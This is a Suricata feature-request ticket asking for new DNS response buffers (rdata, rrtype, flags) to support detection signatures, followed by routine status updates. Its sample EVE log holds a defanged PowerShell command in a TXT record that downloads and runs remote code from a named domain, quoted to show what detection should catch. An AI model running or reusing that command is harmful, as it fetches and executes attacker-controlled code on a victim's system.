Project

General

Profile

Actions

Feature #2448

open

Add additional buffers for DNS Responses

Added by Jack Mott about 6 years ago. Updated 10 months ago.

Status:
New
Priority:
Normal
Assignee:
Target version:
Effort:
Difficulty:
Label:
Beginner, Protocol

Description

Hi,

It would be nice to be able to include additional buffers for the DNS protocol responses to help write more efficient and effective signatures.

I think buffers for sections like rdata and rrtype should be included to cover things like data in TXT Records, but it could be expanded to cover the other sections of the response.

{  
   "timestamp":"2018-02-14T19:12:58.760866-0700",
   "flow_id":345727363089610,
   "pcap_cnt":4,
   "event_type":"dns",
   "src_ip":"8.8.8.8",
   "src_port":53,
   "dest_ip":"192.168.0.105",
   "dest_port":49153,
   "proto":"UDP",
   "dns":{  
      "type":"answer",
      "id":2,
      "rcode":"NOERROR",
      "rrname":"shinobotps1[.]com",
      "rrtype":"TXT",
      "ttl":3600,
      "rdata":"powershell IEX (New-Object Net.WebClient).DownloadString('hxxps:\/\/shinobotps1[.]com\/download_get.php');" 
   }
}

Thanks!


Related issues 2 (2 open0 closed)

Related to Suricata - Feature #2198: Extend the DNS parser to accept dns_response keyword in signaturesNewCommunity TicketActions
Related to Suricata - Task #4097: Suricon 2020 brainstormAssignedVictor JulienActions
Actions #1

Updated by Jason Ish about 6 years ago

  • Related to Feature #2198: Extend the DNS parser to accept dns_response keyword in signatures added
Actions #2

Updated by Andreas Herz about 6 years ago

  • Assignee set to OISF Dev
  • Target version set to TBD
Actions #3

Updated by Victor Julien over 4 years ago

  • Target version changed from TBD to 6.0.0beta1
Actions #4

Updated by Victor Julien over 4 years ago

  • Label Beginner added
Actions #5

Updated by Victor Julien about 4 years ago

  • Label Protocol added
Actions #6

Updated by Victor Julien almost 4 years ago

  • Target version changed from 6.0.0beta1 to 7.0.0-beta1
Actions #7

Updated by Jason Ish over 3 years ago

  • Related to Task #4097: Suricon 2020 brainstorm added
Actions #8

Updated by Jason Ish over 3 years ago

As discussed today in the 2020 brainstorm this is still a desired feature. It should be more or less trivial, but could serve as an example of unifying eve logged buffers, and buffers available for detection. At the very least, the rdata buffer should be exposed a sticky for content matches.

Actions #9

Updated by Victor Julien over 2 years ago

  • Target version changed from 7.0.0-beta1 to 8.0.0-beta1
Actions #10

Updated by Brandon Murphy 10 months ago

It would be nice to have all dns flags parsed as well

perhaps like a dns.flags.z, dns.flags.replycode, etc

doing so would avoid the use of byte_test which are often difficult to read for users attempted to understand the logic in a rule.

Actions

Also available in: Atom PDF